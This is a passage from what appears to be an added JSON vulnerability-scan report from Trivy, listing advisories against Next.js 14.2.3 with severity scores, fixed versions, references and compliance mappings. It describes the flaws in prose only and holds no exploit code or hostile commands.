[CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", + "remediation": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "raw": { + "VulnerabilityID": "GHSA-h25m-26qc-wcjf", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b", + "Title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23864", + "https://vercel.com/changelog/summary-of-cve-2026-23864" + ], + "PublishedDate": "2026-01-28T15:38:01Z", + "LastModifiedDate": "2026-01-28T15:38:01Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2384ada699a3c38e", + "ruleId": "GHSA-mwv6-3258-q52c", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next Vulnerable to Denial of Service with Server Components", + "title": "GHSA-mwv6-3258-q52c", + "description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", + "remediation": "https://github.com/advisories/GHSA-mwv6-3258-q52c", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "raw": { + "VulnerabilityID": "GHSA-mwv6-3258-q52c", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-mwv6-3258-q52c", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a", + "Title": "Next Vulnerable to Denial of Service with Server Components", + "Description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c", + "https://nextjs.org/blog/security-update-2025-12-11", + "https://www.cve.org/CVERecord?id=CVE-2025-55184" + ], + "PublishedDate": "2025-12-11T22:49:27Z", + "LastModifiedDate": "2025-12-11T22:49:28Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9076a243c95555c6", + "ruleId": "GHSA-q4gf-8mx6-v5v3", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js has a Denial of Service with Server Components", + "title": "GHSA-q4gf-8mx6-v5v3", + "description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "remediation": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "raw": { + "VulnerabilityID": "GHSA-q4gf-8mx6-v5v3", + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.15, 16.2.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8", + "Title": "Next.js has a Denial of Service with Server Components", + "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3", + "https://vercel.com/changelog/summary-of-cve-2026-23869" + ], + "PublishedDate": "2026-04-10T15:35:47Z", + "LastModifiedDate": "2026-04-10T15:35:47Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "85e92c5109af9055", + "ruleId": "CVE-2024-47831", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Next.js image optimization has Denial of Service condition", + "title": "CVE-2024-47831", + "description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", + "remediation": "https://avd.aquasec.com/nvd/cve-2024-47831", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-674" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2024-47831", + "VendorIDs": [ + "GHSA-g77x-44xx-532m" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47831", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81", + "Title": "next.js: Next.js image optimization has Denial of Service condition", + "Description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U", + "V3Score": 5.9, + "V40Score": 4.6 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-47831", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a", + "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m", + "https://nvd.nist.gov/vuln/detail/CVE-2024-47831", + "https://www.cve.org/CVERecord?id=CVE-2024-47831" + ], + "PublishedDate": "2024-10-14T18:15:05.013Z", + "LastModifiedDate": "2024-11-08T15:39:21.823Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 14.029866666666669, + "epss": 0.01306, + "epss_percentile": 0.79982, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.05224, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ec4e4216710b1a54", + "ruleId": "CVE-2024-56332", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", + "title": "CVE-2024-56332", + "description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", + "remediation": "https://avd.aquasec.com/nvd/cve-2024-56332", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-770" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2024-56332", + "VendorIDs": [ + "GHSA-7m27-7ghc-44w9" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "13.5.8, 14.2.21, 15.1.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-56332", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5", + "Title": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-770" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2024-56332", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9", + "https://nvd.nist.gov/vuln/detail/CVE-2024-56332", + "https://www.cve.org/CVERecord?id=CVE-2024-56332" + ], + "PublishedDate": "2025-01-03T21:15:13.55Z", + "LastModifiedDate": "2025-09-10T15:48:41.83Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.559466666666669, + "epss": 0.00424, + "epss_percentile": 0.62356, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.01696, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "396a9deaca66993c", + "ruleId": "CVE-2025-55173", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", + "title": "CVE-2025-55173", + "description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-55173", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-20" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-55173", + "VendorIDs": [ + "GHSA-xv57-4mr9-wg8v" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.31, 15.4.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-55173", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e", + "Title": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", + "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-20" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", + "V3Score": 4.3 + } + }, + "References": [ + "http://vercel.com/changelog/cve-2025-55173", + "https://access.redhat.com/security/cve/CVE-2025-55173", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", + "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-55173", + "https://vercel.com/changelog/cve-2025-55173", + "https://www.cve.org/CVERecord?id=CVE-2025-55173" + ], + "PublishedDate": "2025-08-29T22:15:31.75Z", + "LastModifiedDate": "2025-09-08T16:42:57.183Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-20", + "rank": 4, + "category": "Input Validation" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.610133333333334, + "epss": 0.00519, + "epss_percentile": 0.67013, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0207600000000001, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "90791fc1fd7573b4", + "ruleId": "CVE-2025-57752", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", + "title": "CVE-2025-57752", + "description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", + 